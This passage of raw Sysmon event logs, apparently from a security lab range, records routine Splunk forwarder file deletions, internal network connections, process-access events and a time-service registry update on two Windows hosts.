14:18:20.103{2E1864BB-182B-629A-5042-000000005F02}14321372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044262Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:20.330{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=1FCEF8CD3AF83CD224E398F7A1505F5E,SHA256=DCDB81B92B5122666A6518370BF933FEF99D6FE57F181BF01255F89C8C621C2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:21.952{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CACA108685501BF885F636892EACFA42,SHA256=237EB707E03F5DB0DD615F25F61D9E374AAA5EC4C3A440DDDC73D1B527AF8328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044264Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:21.580{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D02994ABAC18CD1316761088A1D374C,SHA256=E3A5B11E224CD9895401137D22D7F217EA429951A381EE28E03A8C902D382257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044266Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:22.674{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6102F4380423A3D6BB52225277966F51,SHA256=215E5A5814F66FAB8B32D3CE52BBB5A2744226788504A64540CEED8A8DF57476,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044265Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:19.748{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52347-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044267Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:23.767{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21D1B997FCFD3B1D762375E5383F7534,SHA256=57D79B635D75A2F68F93C19B7D5F5AB56D60F9EF8FC97BB328EF44BDEEA6D0E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.824{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56375-false10.0.1.12-8000- 10341000x8000000000000000205399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.152{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-182F-629A-5242-000000005F02}7788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.152{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.152{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.152{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.152{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.152{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-182F-629A-5242-000000005F02}7788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.152{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-182F-629A-5242-000000005F02}7788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.153{2E1864BB-182F-629A-5242-000000005F02}7788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:23.083{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7033F3CC68A691D8688D8AECEA2F4CE1,SHA256=B1FD1075C3548513C4AA108ED2F466225F31E68736F391F5322D09F2F75D24AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044268Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:24.861{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EDCA407433B79D5C35B1C135276A194,SHA256=CA67F13E683B55550601636C28254E5B58594D32E7015D420B38FCF2C0074995,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:24.195{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00CE4F95AF17C64A8E05CF300C105470,SHA256=32E19FC20FF10B53C0DDA56D165CA5AB03BE98F5A5A26BE82D407CCD8034106B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:24.109{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=237934914E2CB991A0F96DCD44B498D5,SHA256=F5E58CFC0963656A3B7134FA62F8FCD14F4140D37D9FC3637F0202D879521AC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044269Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:25.955{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22565707CFCF04082FB9E5ABBC44FBCE,SHA256=C5C5E07816082D97CCC87AB74F00CCCE908D9D4A5ABC2EFD52DE35A3B65AB0FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:25.141{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=480FBB96825D5DE3BC62E14C2768327A,SHA256=CD44FF38AD549396634E950CEFA1786213D2A0462CBD427C800032EEF845D519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:26.178{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA6E5CD76D3D494DAEEF0FACBC631E2,SHA256=951C61C18615F3B4B25D6EDF3C906D11887A37DCCEA10E15AF4F905A1FF6257A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:27.209{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF224D50B0E248FA1B098AC6AC5DC2E3,SHA256=1C1439F5CD499CCA94AFB9D52C5F60A71E399DB13296592F9EB397DFE8785475,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044271Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:25.639{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52348-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044270Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:27.049{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47FBBEB4A61799EF9B617D4CE574EFEB,SHA256=2A5A30BFF571C3E757F1006370ACF0FC90152AF40714A20E45F20335A2BB36C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:28.357{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFC5B1AB32F780954886E1A897ACF925,SHA256=19A3E1E88903ED18AE38760492ECF7959998AC4084762E0340DA907C3B1225ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044272Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:28.142{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49A3DAAC439714DCB33DD10E2F29681,SHA256=C21D8E597845D42FA17CA4C52DE60E91B8F8CAE794473EA5F17D64E17649D9ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:29.477{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B93D534B7E11A6CB2CDC22163C657264,SHA256=1B378C9DC5BFD9FDE87E62B0FFE00E1BEF59D6154076BE6E23005189869C351C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044273Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:29.236{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9077D845692D7C22D202B85DCC66E71F,SHA256=0A6E3DDC506D8B94082E42280D72365C2F4E42C9C5062EDBA86AA7F75F26D5A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:26.866{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56376-false10.0.1.12-8000- 13241300x8000000000000000205410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:18:30.842{2E1864BB-E13E-6299-1200-000000005F02}700C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d87754-0xcd0add74) 23542300x8000000000000000205409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:30.496{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED1B7E7AC4917B9426CD4425D5106686,SHA256=D67AC1DE05FB627D93E6E321EBFC76AE2E9392F1E99840A1C5527DF2816BEAE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044274Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:30.330{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0419E111FF466C5DCCF521A6D9248690,SHA256=7171498036E37A7899CEDFD6FA6BC2D794589F40AEAB9626316F76877A0ABF3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:31.580{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E94237F631500F448267B81249DF07A3,SHA256=39858EAA2BAD0703577ABC2E93735A14B09BB8AD5258D3F319A621EC83A3BAE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044275Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:31.424{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76B01541C54C614F92185DB046F53C21,SHA256=A03120B410E1A6E0658C8D1471145311167B1BF3E3C8DB3B5F65E4531FF5D9F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044277Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:30.732{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52349-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044276Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:32.517{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=212D6B92C628EFDBA7FF686D928A5107,SHA256=C993E83C718DE6A02D723EB4013A8DDC8387337BC7C6FD7C6DD3070D12616592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:32.626{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18CCF313AAC50D2563F5D8B9E06C0353,SHA256=640647B8DCFE2B3C6DDDC5CF5886EE8EECE0F79C663E1950879BAA595BF94B47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044278Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:33.611{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6875B7BB237F3D0F228A1C4BE7FEC9A5,SHA256=7B8AAD4B9FB675CC2501C27955349E572144085FB321BB34F714E825CC2850BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:33.742{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=605079DD20CFDFEA1E4B6EFB9C44C622,SHA256=EA243FD5E06C43FD1AF93A0C3318D50D4A097B1C7DA827301380A9B80748D44A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044279Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:34.705{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE6E00A222D55591E0DD2A44075C3F1A,SHA256=B9C14F28932849257D4E2C1A31C424861AD43508DA2A05215FB3C82EC69FE85D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:34.859{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E0C787F3AACD22524FD86F84D43F809,SHA256=27AC21CD2099CCCE0C521AEE69D487CD26D422287721DA4D7EE21FE799B37F63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044280Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:35.799{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD5E3A869A9FAC830D82B48A442CA3EA,SHA256=433E0698F3010189FFE3F314EDA09C0A93C5F973CBA4C0D7AE9DD96475AF02FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:35.910{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 